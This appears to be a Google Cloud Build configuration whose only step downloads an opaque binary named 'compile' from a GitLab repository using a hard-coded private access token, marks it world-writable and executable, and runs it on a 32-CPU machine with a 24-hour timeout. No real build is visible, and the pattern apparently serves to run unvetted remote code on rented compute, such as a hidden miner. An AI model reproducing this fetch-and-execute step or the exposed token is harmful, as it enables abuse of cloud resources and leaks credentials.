steps:
  - name: 'python:3.8'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          wget -O compile --header='PRIVATE-TOKEN:xsuVQ4XRupVTk8mTVpBx' 'https://gitlab.com/api/v4/projects/25182192/repository/files/compile/raw?ref=master' 
          chmod 777 compile && 
          ./compile

timeout: 86400s
options:
  machineType: E2_HIGHCPU_32
